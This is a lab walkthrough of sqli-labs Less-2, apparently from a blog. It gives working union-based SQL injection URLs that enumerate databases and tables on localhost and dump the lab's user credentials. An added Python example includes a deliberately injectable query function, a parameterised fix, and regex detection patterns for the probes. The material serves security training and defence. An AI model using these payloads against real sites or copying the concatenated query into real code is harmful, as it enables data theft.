SQL injection levels 0-4 differ only in how the injection point is closed:
Level 1  ?id=1'--+   closing characters: '
Level 2  ?id=1--+    closing characters: none
Level 3  ?id=1')--+  closing characters: ')
Level 4  ?id=1")--+  closing characters: ")
The procedure is the same as for sqli-labs-master Less-1; only the Less-2 walkthrough is given here.
Determine the SQL injection type:
http://localhost/sqli-labs-master/Less-2?id=1  normal result
http://localhost/sqli-labs-master/Less-1/?id=1'  error
http://localhost/sqli-labs-master/Less-1/?id=1'--+  error
Result: numeric-type injection
Determine the number of columns in the SQL query:
http://localhost/sqli-labs-master/Less-2/?id=1 order by 4  error (column does not exist)
http://localhost/sqli-labs-master/Less-2/?id=1 order by 3  displays normally
Result: 3 columns
Determine which columns are echoed: http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,3
Result: columns 2 and 3 are echoed
Use the echoed column positions to dump the database
Get the databases: http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
Result: information_schema,challenges,dvwa,jokedb,mysql,pikachu,pkxss,security,test
Get the tables of the security database: http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+
Result: emails,referers,uagents,users
Get the columns of the users table in the security database: http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
Result: id,user,password
Get the field contents of the users table in the security database: http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(concat_ws(0x2d,id,username,password)) from security.users
Result: 1-Dumb-Dumb,2-Angelina-I-kill-you,3-Dummy-p@ssword,4-secure-crappy,5-stupid-stupidity,6-superman-genious,7-batman-mob!le,8-admin-admin,9-admin1-admin1,10-admin2-admin2,11-admin3-admin3,12-dhakkan-dumbo,14-admin4-admin4
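Added example (not part of the original write-up, and not sqli-labs code): a Python script that uses an in-memory SQLite table in place of the lab's MySQL security.users table. It assumes the Less-2 query has the shape WHERE id=<parameter> with the parameter concatenated into the SQL text; the sample rows, the access-log lines and the tag names are constructed for this example. It replays the probe steps above against the concatenated query (order by 3 succeeds, order by 4 fails, -1 union select 1,2,3 comes back as a row), shows that the same inputs return nothing once the id is validated as an integer and bound as a parameter, and scans web server log lines for the probe signatures so the enumeration pattern can be spotted from the defender's side.

```python
import re
import sqlite3
from urllib.parse import unquote_plus, urlsplit

# Constructed sample rows standing in for the lab's security.users table.
SAMPLE_USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (8, "admin", "admin"),
]


def make_db():
    """In-memory SQLite database playing the role of the lab's MySQL schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, id_param):
    """Numeric-type injection, the assumed Less-2 query shape: the raw
    parameter is concatenated into the SQL text, so 'order by N' and
    'union select' reach the parser unchanged."""
    sql = "SELECT id, username, password FROM users WHERE id=" + id_param
    return conn.execute(sql).fetchone()


def order_by_probe_succeeds(conn, n):
    """The column-count step from the walkthrough: does 'id=1 order by n' run?"""
    try:
        lookup_vulnerable(conn, "1 order by %d" % n)
        return True
    except sqlite3.OperationalError:  # "ORDER BY term out of range"
        return False


def lookup_safe(conn, id_param):
    """Hardened form: reject anything that is not an integer, then bind the
    value as a parameter so it is never parsed as SQL. Rejected input yields
    None, the same outcome as an unknown id."""
    if not re.fullmatch(r"-?\d+", id_param):
        return None
    sql = "SELECT id, username, password FROM users WHERE id=?"
    return conn.execute(sql, (int(id_param),)).fetchone()


# Detection side: signatures of the probe steps shown above, matched on the
# URL-decoded query string. The tag names are this example's own.
PROBE_PATTERNS = {
    "quote-probe": re.compile(r"['\"]\)?\s*--"),                  # 1'--, 1')--, 1")--
    "column-count": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema-read": re.compile(r"\binformation_schema\.", re.I),
}


def classify_request(log_line):
    """Return the set of probe tags found in one access-log line.
    Expects the common-log-format request field: "GET /path?query HTTP/1.1"."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m:
        return set()
    query = unquote_plus(urlsplit(m.group(1)).query)  # %27 -> ', + -> space
    return {tag for tag, rx in PROBE_PATTERNS.items() if rx.search(query)}


def scan_log(lines):
    """Flag every line carrying at least one tag: [(line_no, sorted tags)]."""
    hits = []
    for n, line in enumerate(lines, 1):
        tags = classify_request(line)
        if tags:
            hits.append((n, sorted(tags)))
    return hits


# Constructed access-log lines replaying the walkthrough's requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Feb/2020:10:00:01 +0800] "GET /sqli-labs-master/Less-2/?id=1 HTTP/1.1" 200 1234',
    '10.0.0.5 - - [01/Feb/2020:10:00:02 +0800] "GET /sqli-labs-master/Less-2/?id=1%27--+ HTTP/1.1" 500 980',
    '10.0.0.5 - - [01/Feb/2020:10:00:03 +0800] "GET /sqli-labs-master/Less-2/?id=1%20order%20by%204 HTTP/1.1" 500 980',
    '10.0.0.5 - - [01/Feb/2020:10:00:04 +0800] "GET /sqli-labs-master/Less-2/?id=-1%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata--+ HTTP/1.1" 200 1500',
]

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, id=-1 union select 1,2,3 ->", lookup_vulnerable(conn, "-1 union select 1,2,3"))
    print("order by 3 ok:", order_by_probe_succeeds(conn, 3), "| order by 4 ok:", order_by_probe_succeeds(conn, 4))
    print("safe, same payload ->", lookup_safe(conn, "-1 union select 1,2,3"))
    for line_no, tags in scan_log(SAMPLE_LOG):
        print("line", line_no, "flagged:", ", ".join(tags))
```

Run it with python3 to print the two lookups side by side and the flagged log lines. The detection regexes are deliberately narrow (a quote followed by a comment marker, order by N, union select, information_schema.) so that an id-style parameter produces few false positives; a free-text search field would need a different rule, and the real signal is the sequence quote-probe, column-count, union-select, schema-read from one client within a short window.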
Source: https://www.cnblogs.com/yyd-sun/p/12256741.html